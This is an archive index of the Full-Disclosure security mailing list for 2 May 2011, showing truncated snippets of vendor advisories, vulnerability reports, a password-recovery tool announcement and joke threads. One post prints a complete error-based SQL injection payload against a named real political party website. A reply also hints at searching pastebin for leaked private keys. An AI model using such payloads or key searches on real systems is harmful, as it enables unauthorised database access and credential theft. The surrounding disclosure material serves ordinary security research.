[Full-disclosure] [ MDVSA-2011:081 ] kdenetwork4

2011-05-02 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:081 http://www.mandriva.com/security/

[Full-disclosure] [ MDVSA-2011:082 ] python-feedparser

2011-05-02 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:082 http://www.mandriva.com/security/

[Full-disclosure] Released SmartFTP Password Decryptor !

2011-05-02 Thread SecurityXploded Group
Hi all, SmartftpPasswordDecryptor is the FREE software to instantly recover FTP login passwords stored by SmartFTP - one of the popular FTP clients. It presents both GUI as well as command line interface which makes it useful for Penetration testers as well as Forensic investigators. For more

[Full-disclosure] TeamSHATTER Security Advisory: Multiple SQL Injection in Oracle Enterprise Manager Service Level component

2011-05-02 Thread Shatter
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 TeamSHATTER Security Advisory April 21, 2011 Risk Level: High Affected versions: Oracle Enterprise Manager 11g Release 1 Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Martinez Fayo of Application

[Full-disclosure] [USN-1127-1] usb-creator vulnerability

2011-05-02 Thread Marc Deslauriers
== Ubuntu Security Notice USN-1127-1 May 02, 2011 usb-creator vulnerability == A security issue affects these releases of Ubuntu and its derivatives: -

Re: [Full-disclosure] BEGIN PGP PRIVATE KEY BLOCK

2011-05-02 Thread Georgi Guninski
for openssl rsa keys the query would appear to be -BEGIN RSA PRIVATE KEY of interest seem pastebin.com entries not containing human readable keys ;) On Sat, Apr 30, 2011 at 03:58:19PM +0530, satyam pujari wrote:

Re: [Full-disclosure] ZDI-11-143: Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability

2011-05-02 Thread VSR Advisories
Hello, VSR independently discovered this SQL injection flaw (CVE-2011-1610) and reported it to Cisco on November 11, 2010. Since we had very limited time to preform testing on the product, and because Cisco informed us that another researcher had reported the same flaw shortly before us, we

[Full-disclosure] [ISecAuditors Security Advisories] Multiple vulnerabilities in Hi5.com social network

2011-05-02 Thread ISecAuditors Security Advisories
= INTERNET SECURITY AUDITORS ALERT 2010-11 - Original release date: 29th October 2010 - Last revised: 1st May 2011 - Discovered by: Eduardo Garcia Melia - Severity: 7.8/10 (CVSSv2 Base Scored) = I.

[Full-disclosure] [ISecAuditors Security Advisories] XSS in Oracle AS Portal 10g

2011-05-02 Thread ISecAuditors Security Advisories
= INTERNET SECURITY AUDITORS ALERT 2010-007 - Original release date: August 11th, 2010 - Last revised: May 1st, 2011 - Discovered by: Vicente Aguilera Diaz - Severity: 5.0/10 (CVSS Base Scored) = I.

[Full-disclosure] conservative.ca SQL Injection

2011-05-02 Thread m4l1c3
http://www.conservative.ca/index.php?section_copy_id=21257�ion_i' AND (SELECT 3997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,108,121,58),(SELECT (CASE WHEN (3997=3997) THEN 1 ELSE 0 END)),CHAR(58,112,119,105,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'NHNb'='NHN DBMS

[Full-disclosure] Call For Papers: International Journal Network Protocols and Algorithms

2011-05-02 Thread Jaime Lloret Mauri
* Call for Papers * Network Protocols and Algorithms ISSN 1943-3581 http://www.macrothink.org/journal/index.php/npa/ Network Protocols and Algorithms is a free-access online international journal, peer-reviewed and published by Macrothink Institute.

Re: [Full-disclosure] Musn'tlive

2011-05-02 Thread Cal Leeming
Huh? On Mon, May 2, 2011 at 10:43 AM, phocean 0...@phocean.net wrote: OpenBSD 4.9 was released... where is Musn'tlive ?? :D -- phocean ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Re: [Full-disclosure] Multiple Vendors libc/glob()GLOB_BRACE|GLOB_LIMIT memory exhaustion

2011-05-02 Thread Cassidy MacFarlane
Sent from my HTC -Original Message- From: Maksymilian Arciemowicz c...@securityreason.com Sent: 02 May 2011 00:16 To: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Multiple Vendors libc/glob()GLOB_BRACE|GLOB_LIMIT memory exhaustion

Re: [Full-disclosure] Musn'tlive

2011-05-02 Thread Zach C.
To warn us all about Theo's latest rootkits and collusions with the governments of course. On May 2, 2011 10:02 AM, Cal Leeming c...@foxwhisper.co.uk wrote: Huh? On Mon, May 2, 2011 at 10:43 AM, phocean 0...@phocean.net wrote: OpenBSD 4.9 was released... where is Musn'tlive ?? :D --

Re: [Full-disclosure] Musn'tlive

2011-05-02 Thread Cal Leeming
*woosh* On Mon, May 2, 2011 at 6:24 PM, Zach C. fxc...@gmail.com wrote: To warn us all about Theo's latest rootkits and collusions with the governments of course. On May 2, 2011 10:02 AM, Cal Leeming c...@foxwhisper.co.uk wrote: Huh? On Mon, May 2, 2011 at 10:43 AM, phocean

[Full-disclosure] [USN-1128-1] Vino vulnerabilities

2011-05-02 Thread Marc Deslauriers
== Ubuntu Security Notice USN-1128-1 May 02, 2011 vino vulnerabilities == A security issue affects these releases of Ubuntu and its derivatives: -

[Full-disclosure] Covert Backdoor in is All BSD {free, net, open, dragon, pc, (un)trusted}

2011-05-02 Thread Григорий Братислава
                  MusntLive Security Advisory                            2nd May, 2011 Covert Backdoor(s) in is all BSDs via is way of OpenBSD

Re: [Full-disclosure] Covert Backdoor in is All BSD {free, net, open, dragon, pc, (un)trusted}

2011-05-02 Thread phocean
I knew it!! :D Is you MusntLive is my hero! Is very very bad is Theo! Le lundi 02 mai 2011 à 14:05 -0400, Григорий Братислава a écrit : MusntLive Security Advisory

Re: [Full-disclosure] Stuxnet

2011-05-02 Thread huj huj huj
probably not so much stealing as making fun of your teenie way of expressing yourself :) 2011/5/1 Cal Leeming c...@foxwhisper.co.uk Lol @ you stealing my lots of love and xoxo signature... At least come up with your own stuff ;) On Sun, May 1, 2011 at 5:58 PM, Benji m...@b3nji.com wrote:

[Full-disclosure] ff4 app

2011-05-02 Thread t0hitsugu
Not much of a find, but the firefox4 app for android transmits your google accounts email/password in plain text when receiving an email from the gmail application service. This is viewable with the DOM-inspector add-on, and can also be seen by anyone using wireshark, ettercap, etc. Still, not

Re: [Full-disclosure] Musn'tlive

2011-05-02 Thread Nicolai
I think his busy writing advisories about dangerous XXS and Full path disclosures in crappy-(unused)-themes for WordPress. That seems to be his point of interest, but at least he doesn't spam my inbox with Insect Pro-spam. Also: translated edition only for you Григорий Братислава: Is think is

[Full-disclosure] Vulnerabilities in multiple themes for ExpressionEngine (update)

2011-05-02 Thread MustLive
Hello list! It's additional information concerning vulnerabilities in multiple themes for ExpressionEngine, which I informed earlier. Recently Bjorn Borresen, author of ports of WooThemes' themes for ExpressionEngine (which was hired by WooThemes for porting their themes for this engine),

Re: [Full-disclosure] ff4 app

2011-05-02 Thread t0hitsugu
It was the 's' that brought it to my attention. On May 2, 2011 1:59 PM, Daniel Llewellyn diddle...@gmail.com wrote: On 02/05/2011 20:08, t0hitsugu wrote: Not much of a find, but the firefox4 app for android transmits your google accounts email/password in plain text posted a picture here, as

[Full-disclosure] Vulnerabilities in theme Magazeen для WordPress and Dotclear

2011-05-02 Thread MustLive
Hello list! I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in theme Magazeen for WordPress and Dotclear. SecurityVulns ID: 11635. - Affected products: - Similarly